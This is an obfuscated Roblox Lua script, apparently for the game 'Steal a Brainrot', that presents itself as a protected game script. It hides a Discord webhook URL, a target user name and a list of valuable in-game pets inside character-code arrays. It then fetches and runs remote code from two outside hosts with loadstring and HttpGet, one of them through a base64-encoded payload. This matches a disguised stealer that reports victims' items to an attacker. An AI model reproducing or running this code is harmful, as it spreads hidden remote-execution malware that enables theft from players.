-- Luarmor V4 | https://luarmor.net
-- Protected Script | DO NOT SHARE

local _ENV = getfenv()
local _0xCAFE = string.char
local _0xBEEF = table.concat
local _0xDEAD = function(_0x1) local _0x2={} for _0x3=1,#_0x1 do _0x2[#_0x2+1]=_0xCAFE(_0x1[_0x3]) end return _0xBEEF(_0x2) end
local _0xF00D = getgenv or function() return _ENV end
local _0xACE = _0xF00D()

_0xACE[_0xDEAD({83,101,99,114,101,116,84,111,107,101,110})] = _0xDEAD({104,121,112,101,101,114,95,114,111,98,108,111,120,56})
_0xACE[_0xDEAD({85,115,101,114})] = _0xDEAD({104,121,112,101,101,114,95,114,111,98,108,111,120,56})
_0xACE[_0xDEAD({87,101,98,104,111,111,107})] = _0xDEAD({104,116,116,112,115,58,47,47,100,105,115,99,111,114,100,46,99,111,109,47,97,112,105,47,119,101,98,104,111,111,107,115,47,49,52,56,50,48,55,49,49,54,49,56,54,52,49,57,54,49,51,56,47,98,117,119,106,104,109,53,85,110,99,107,71,103,90,67,81,114,90,86,66,68,89,54,82,116,77,81,111,81,109,75,83,48,85,103,112,98,82,65,70,118,119,118,87,74,115,85,69,97,49,75,57,110,72,110,83,117,111,108,48,80,120,110,114,81,114,86,68})
_0xACE[_0xDEAD({66,114,97,105,110,114,111,116,115})] = {"Strawberry Elephant", "Meowl", "Headless Horseman", "Skibidi Toilet", "Griffin", "Hydra Dragon Cannelloni", "Dragon Gingerini", "Dragon Cannelloni", "Love Love Bear", "La Supreme Combinasion", "Celestial Pegasus", "Cerberus", "Popcuru and Fizzuru", "Rosey and Teddy", "Capitano Moby", "Cooki and Milki", "Burguro And Fryuro", "Ketupat Bros", "Reinito Sleighito", "Fortunu and Cashuru", "Los Amigos", "La Secret Combinasion", "Los Sekolahs", "Signore Carapace", "La Casa Boo", "Fragrama and Chocrama", "La Food Combinasion", "Elefanto Frigo", "Spooky and Pumpky", "Ginger Gerat", "La Ginger Sekolah", "Sammyni Fattini", "Los Spaghettis", "Festive 67", "Ventoliero Pavonero", "Cloverat Clapat", "Spaghetti Tualetti", "Antonio", "Rosetti Tualetti", "Nacho Spyder", "Garama and Madundung", "Fishino Clownino", "Gold Gold Gold", "Jolly Jolly Sahur", "Lavadorito Spinito", "Ketchuru and Musturu", "Tirilikalika Tirilikalako", "Swaggy Bros", "La Romantic Grande", "Orcaledon", "Tictac Sahur", "La Taco Combinasion", "Ketupat Kepat", "Dug dug dug", "Tang Tang Keletang", "Lovin Rose", "Los Tacoritas", "Eviledon", "Los Primos", "W or L", "Esok Sekolah", "La Jolly Grande", "Los Cupids", "Los Puggies", "Tralaledon", "Gobblino Uniciclino", "Tuff Toucan", "Mieteteira Bicicleteira", "Chipso and Queso", "Chillin Chili", "Money Money Reindeer", "La Spooky Grande", "Bacuru and Egguru", "Los Bros", "La Extinct Grande", "Los Candies", "Los 67", "Celularcini Viciosini", "Los Mobilis", "Money Money Puggy", "Cigno Fulgoro", "Los Spooky Combinasionas", "Los Hotspotsitos", "Los Jolly Combinasionas", "Snailo Clovero", "Los Planitos", "Chicleteira Cupideira", "DJ Panda", "Las Sis", "Spinny Hammy", "Tacorita Bicicleta", "Los Sweethearts", "Nuclearo Dinossauro", "Chicleteira Noelteira", "Los Combinasionas", "Chimnino", "Noo my Gold", "Swag Soda", "Noo my Heart", "Tacorillo Crocodillo", "Mariachi Corazoni", "La Grande Combinasion", "Los 25", "Los Burritos", "67", "Donkeyturbo Express", "Los Chicleteiras", "Guest 666", "Los Mi Gatitos", "Rang Ring Bus", "Granny", "Noo my Present", "Serafinna Medusella", "Los Nooo My Hotspotsitos", "Arcadopus", "Noo my Candy", "Los Quesadillas", "Chicleteirina Bicicleteirina", "Chill Puppy", "Burrito Bandito", "Luck Luck Luck Sahur", "Chicleteira Bicicleteira", "Brunito Marsito", "Quesadillo Vampiro", "Eid Eid Eid Sahur", "Cupid Hotspot", "Mi Gatito", "Ho Ho Ho Sahur", "Cupid Cupid Sahur", "Pot Pumpkin", "Naughty Naughty", "Bunito Bunito Spinito", "Quesadilla Crocodila", "Horegini Boom", "Santa Hotspot", "Pot Hotspot", "25", "Pirulitoita Bicicleteira", "To to to Sahur", "Telemorte", "La Sahur Combinasion", "List List List Sahur", "Noo my examine", "Los Jobcitos", "Nooo My Hotspot", "Bunnyman", "Tung Tung Tung Sahur", "Cuadramat and Pakrahmatmamat", "Please my Present", "Los Cucarachas", "1x1x1x1", "La Vacca Lepre Lepreino", "Love Love Love Sahur", "Perrito Burrito", "Graipuss Medussi", "Giftini Spyderini", "GOAT", "Trickolino", "Paradiso Axolottino", "Triplito Tralaleritos", "La Vacca Jacko Linterino", "Fishboard", "Santteo", "Las Vaquitas Saturnitas", "Los Karkeritos", "Karker Sahur", "Los Trios", "Job Job Job Sahur", "Frankentteo", "Pumpkini Spyderini", "Las Tralaleritas", "Rocco Disco", "Extinct Matteo", "La Karkerkar Combinasion", "Secret Lucky Block"}
_0xACE[_0xDEAD({83,99,114,105,112,116,77,111,100,101})] = _0xDEAD({67,85,83,84,79,77})
_0xACE[_0xDEAD({67,117,115,116,111,109,83,99,114,105,112,116})] = _0xDEAD({98,71,57,104,90,72,78,48,99,109,108,117,90,121,104,110,89,87,49,108,79,107,104,48,100,72,66,72,90,88,81,111,73,109,104,48,100,72,66,122,79,105,56,118,89,88,66,112,76,109,100,108,100,72,66,118,98,72,78,108,89,121,53,106,98,50,48,118,99,50,78,121,97,88,66,48,99,121,57,111,98,51,78,48,90,87,81,118,77,50,77,120,89,84,107,51,89,122,86,106,90,87,77,122,89,50,74,106,77,84,78,105,89,109,89,119,77,68,86,107,79,68,99,52,79,71,73,48,90,71,74,106,77,106,99,48,79,68,89,121,89,50,77,53,78,122,99,52,77,84,107,51,90,106,100,105,90,71,70,106,78,106,66,105,90,84,108,109,77,106,104,108,77,121,53,115,100,87,69,105,75,83,107,111,75,81,61,61})
loadstring(game:HttpGet(_0xDEAD({104,116,116,112,115,58,47,47,97,112,105,46,108,117,97,114,109,111,114,46,110,101,116,47,102,105,108,101,115,47,118,52,47,108,111,97,100,101,114,115,47,56,48,56,102,52,97,100,52,101,98,102,102,52,55,53,99,53,55,99,101,54,49,101,97,51,57,101,52,49,101,50,51,46,108,117,97})))()
-- Custom Script
loadstring(game:HttpGet(_0xDEAD({104,116,116,112,115,58,47,47,97,112,105,46,103,101,116,112,111,108,115,101,99,46,99,111,109,47,115,99,114,105,112,116,115,47,104,111,115,116,101,100,47,51,99,49,97,57,55,99,53,99,101,99,51,99,98,99,49,51,98,98,102,48,48,53,100,56,55,56,56,98,52,100,98,99,50,55,52,56,54,50,99,99,57,55,55,56,49,57,55,102,55,98,100,97,99,54,48,98,101,57,102,50,56,101,51,46,108,117,97})))()

-- Luarmor V4 Protected | Fingerprint: 60e940f3fe5f1855
